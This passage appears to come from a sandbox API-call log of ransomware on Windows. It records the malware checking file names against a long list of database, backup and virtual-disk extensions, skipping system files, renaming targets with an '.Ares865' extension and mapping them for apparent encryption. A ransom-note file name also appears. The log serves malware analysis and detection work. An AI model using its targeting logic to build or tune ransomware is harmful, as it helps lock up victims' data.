lpString2="qry") returned -1 [0086.031] lstrlenW (lpString="qvd") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.031] lstrlenW (lpString="rbf") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.031] lstrlenW (lpString="rctd") returned 4 [0086.031] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.031] lstrlenW (lpString="rod") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.031] lstrlenW (lpString="rodx") returned 4 [0086.031] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.031] lstrlenW (lpString="rpd") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.031] lstrlenW (lpString="rsd") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.031] lstrlenW (lpString="sas7bdat") returned 8 [0086.031] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.031] lstrlenW (lpString="sbf") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.031] lstrlenW (lpString="scx") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.031] lstrlenW (lpString="sdb") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.031] lstrlenW (lpString="sdc") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.031] lstrlenW (lpString="sdf") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.031] lstrlenW (lpString="sis") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.031] lstrlenW (lpString="spq") returned 3 [0086.031] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.031] lstrlenW (lpString="te") returned 2 [0086.031] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.031] lstrlenW (lpString="teacher") returned 7 [0086.031] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.031] lstrlenW (lpString="tmd") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.032] lstrlenW (lpString="tps") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.032] lstrlenW (lpString="trc") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.032] lstrlenW (lpString="trc") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.032] lstrlenW (lpString="trm") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.032] lstrlenW (lpString="udb") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.032] lstrlenW (lpString="udl") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.032] lstrlenW (lpString="usr") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.032] lstrlenW (lpString="v12") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.032] lstrlenW (lpString="vis") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.032] lstrlenW (lpString="vpd") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.032] lstrlenW (lpString="vvv") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.032] lstrlenW (lpString="wdb") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.032] lstrlenW (lpString="wmdb") returned 4 [0086.032] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.032] lstrlenW (lpString="wrk") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.032] lstrlenW (lpString="xdb") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.032] lstrlenW (lpString="xld") returned 3 [0086.032] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.032] lstrlenW (lpString="xmlff") returned 5 [0086.032] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.032] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.Ares865") returned 80 [0086.032] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.034] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.034] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49504) returned 1 [0086.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.035] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.035] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.035] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.036] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc460, lpName=0x0) returned 0x15c [0086.037] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc460) returned 0x190000 [0086.040] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.041] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.041] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0086.042] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.042] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0086.042] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.042] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0086.042] CloseHandle (hObject=0x15c) returned 1 [0086.042] CloseHandle (hObject=0x118) returned 1 [0086.042] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.042] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.042] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.043] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x248aaf00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x248aaf00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x16f60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOINTL.DLL.trx_dll", cAlternateFileName="MSOINT~1.TRX")) returned 1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2=".") returned 1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="..") returned 1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="windows") returned -1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="temp") returned -1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="boot") returned 1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="perflogs") returned -1 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0086.043] lstrlenW (lpString="MSOINTL.DLL.trx_dll") returned 19 [0086.043] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll") returned 72 [0086.043] lstrcpyW (in: lpString1=0x2cce468, lpString2="MSOINTL.DLL.trx_dll" | out: lpString1="MSOINTL.DLL.trx_dll") returned="MSOINTL.DLL.trx_dll" [0086.043] lstrlenW (lpString="MSOINTL.DLL.trx_dll") returned 19 [0086.043] lstrlenW (lpString="Ares865") returned 7 [0086.043] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.043] lstrlenW (lpString=".dll") returned 4 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0086.043] lstrlenW (lpString=".lnk") returned 4 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0086.043] lstrlenW (lpString=".ini") returned 4 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0086.043] lstrlenW (lpString=".sys") returned 4 [0086.043] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0086.043] lstrlenW (lpString="MSOINTL.DLL.trx_dll") returned 19 [0086.043] lstrlenW (lpString="bak") returned 3 [0086.044] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.044] lstrlenW (lpString="ba_") returned 3 [0086.044] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.044] lstrlenW (lpString="dbb") returned 3 [0086.044] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.044] lstrlenW (lpString="vmdk") returned 4 [0086.044] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.044] lstrlenW (lpString="rar") returned 3 [0086.044] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.044] lstrlenW (lpString="zip") returned 3 [0086.044] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.044] lstrlenW (lpString="tgz") returned 3 [0086.044] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.044] lstrlenW (lpString="vbox") returned 4 [0086.044] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.044] lstrlenW (lpString="vdi") returned 3 [0086.044] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.044] lstrlenW (lpString="vhd") returned 3 [0086.044] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.044] lstrlenW (lpString="vhdx") returned 4 [0086.044] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.044] lstrlenW (lpString="avhd") returned 4 [0086.044] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.044] lstrlenW (lpString="db") returned 2 [0086.044] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.044] lstrlenW (lpString="db2") returned 3 [0086.044] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.044] lstrlenW (lpString="db3") returned 3 [0086.044] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.044] lstrlenW (lpString="dbf") returned 3 [0086.044] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.044] lstrlenW (lpString="mdf") returned 3 [0086.044] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.044] lstrlenW (lpString="mdb") returned 3 [0086.045] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.045] lstrlenW (lpString="sql") returned 3 [0086.045] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.045] lstrlenW (lpString="sqlite") returned 6 [0086.045] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.045] lstrlenW (lpString="sqlite3") returned 7 [0086.045] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.045] lstrlenW (lpString="sqlitedb") returned 8 [0086.045] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.045] lstrlenW (lpString="xml") returned 3 [0086.045] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.045] lstrlenW (lpString="$er") returned 3 [0086.045] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.045] lstrlenW (lpString="4dd") returned 3 [0086.045] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.045] lstrlenW (lpString="4dl") returned 3 [0086.045] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.045] lstrlenW (lpString="^^^") returned 3 [0086.045] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.045] lstrlenW (lpString="abs") returned 3 [0086.045] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.045] lstrlenW (lpString="abx") returned 3 [0086.045] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.045] lstrlenW (lpString="accdb") returned 5 [0086.045] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.045] lstrlenW (lpString="accdc") returned 5 [0086.045] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.045] lstrlenW (lpString="accde") returned 5 [0086.045] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.045] lstrlenW (lpString="accdr") returned 5 [0086.045] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.045] lstrlenW (lpString="accdt") returned 5 [0086.045] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.045] lstrlenW (lpString="accdw") returned 5 [0086.045] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.045] lstrlenW (lpString="accft") returned 5 [0086.045] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.045] lstrlenW (lpString="adb") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.046] lstrlenW (lpString="adb") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.046] lstrlenW (lpString="ade") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.046] lstrlenW (lpString="adf") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.046] lstrlenW (lpString="adn") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.046] lstrlenW (lpString="adp") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.046] lstrlenW (lpString="alf") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.046] lstrlenW (lpString="ask") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.046] lstrlenW (lpString="btr") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.046] lstrlenW (lpString="cat") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.046] lstrlenW (lpString="cdb") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.046] lstrlenW (lpString="ckp") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.046] lstrlenW (lpString="cma") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.046] lstrlenW (lpString="cpd") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.046] lstrlenW (lpString="dacpac") returned 6 [0086.046] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.046] lstrlenW (lpString="dad") returned 3 [0086.046] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.046] lstrlenW (lpString="dadiagrams") returned 10 [0086.046] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0086.046] lstrlenW (lpString="daschema") returned 8 [0086.046] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.046] lstrlenW (lpString="db-journal") returned 10 [0086.046] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0086.046] lstrlenW (lpString="db-shm") returned 6 [0086.047] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.047] lstrlenW (lpString="db-wal") returned 6 [0086.047] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.047] lstrlenW (lpString="dbc") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.047] lstrlenW (lpString="dbs") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.047] lstrlenW (lpString="dbt") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.047] lstrlenW (lpString="dbv") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.047] lstrlenW (lpString="dbx") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.047] lstrlenW (lpString="dcb") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.047] lstrlenW (lpString="dct") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.047] lstrlenW (lpString="dcx") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.047] lstrlenW (lpString="ddl") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.047] lstrlenW (lpString="dlis") returned 4 [0086.047] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.047] lstrlenW (lpString="dp1") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.047] lstrlenW (lpString="dqy") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.047] lstrlenW (lpString="dsk") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.047] lstrlenW (lpString="dsn") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.047] lstrlenW (lpString="dtsx") returned 4 [0086.047] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.047] lstrlenW (lpString="dxl") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.047] lstrlenW (lpString="eco") returned 3 [0086.047] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.047] lstrlenW (lpString="ecx") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.048] lstrlenW (lpString="edb") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.048] lstrlenW (lpString="epim") returned 4 [0086.048] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.048] lstrlenW (lpString="fcd") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.048] lstrlenW (lpString="fdb") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.048] lstrlenW (lpString="fic") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.048] lstrlenW (lpString="flexolibrary") returned 12 [0086.048] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0086.048] lstrlenW (lpString="fm5") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.048] lstrlenW (lpString="fmp") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.048] lstrlenW (lpString="fmp12") returned 5 [0086.048] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.048] lstrlenW (lpString="fmpsl") returned 5 [0086.048] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.048] lstrlenW (lpString="fol") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.048] lstrlenW (lpString="fp3") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.048] lstrlenW (lpString="fp4") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.048] lstrlenW (lpString="fp5") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.048] lstrlenW (lpString="fp7") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.048] lstrlenW (lpString="fpt") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.048] lstrlenW (lpString="frm") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.048] lstrlenW (lpString="gdb") returned 3 [0086.048] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.048] lstrlenW (lpString="gdb") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.049] lstrlenW (lpString="grdb") returned 4 [0086.049] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.049] lstrlenW (lpString="gwi") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.049] lstrlenW (lpString="hdb") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.049] lstrlenW (lpString="his") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.049] lstrlenW (lpString="ib") returned 2 [0086.049] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.049] lstrlenW (lpString="idb") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.049] lstrlenW (lpString="ihx") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.049] lstrlenW (lpString="itdb") returned 4 [0086.049] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.049] lstrlenW (lpString="itw") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.049] lstrlenW (lpString="jet") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.049] lstrlenW (lpString="jtx") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.049] lstrlenW (lpString="kdb") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.049] lstrlenW (lpString="kexi") returned 4 [0086.049] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.049] lstrlenW (lpString="kexic") returned 5 [0086.049] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.049] lstrlenW (lpString="kexis") returned 5 [0086.049] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.049] lstrlenW (lpString="lgc") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.049] lstrlenW (lpString="lwx") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.049] lstrlenW (lpString="maf") returned 3 [0086.049] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.050] lstrlenW (lpString="maq") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.050] lstrlenW (lpString="mar") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.050] lstrlenW (lpString="marshal") returned 7 [0086.050] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.050] lstrlenW (lpString="mas") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.050] lstrlenW (lpString="mav") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.050] lstrlenW (lpString="maw") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.050] lstrlenW (lpString="mdbhtml") returned 7 [0086.050] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.050] lstrlenW (lpString="mdn") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.050] lstrlenW (lpString="mdt") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.050] lstrlenW (lpString="mfd") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.050] lstrlenW (lpString="mpd") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.050] lstrlenW (lpString="mrg") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.050] lstrlenW (lpString="mud") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.050] lstrlenW (lpString="mwb") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.050] lstrlenW (lpString="myd") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.050] lstrlenW (lpString="ndf") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.050] lstrlenW (lpString="nnt") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.050] lstrlenW (lpString="nrmlib") returned 6 [0086.050] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.050] lstrlenW (lpString="ns2") returned 3 [0086.050] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.051] lstrlenW (lpString="ns3") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.051] lstrlenW (lpString="ns4") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.051] lstrlenW (lpString="nsf") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.051] lstrlenW (lpString="nv") returned 2 [0086.051] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.051] lstrlenW (lpString="nv2") returned 3 [0086.051] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.051] lstrlenW (lpString="nwdb") returned 4 [0086.051] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.051] lstrlenW 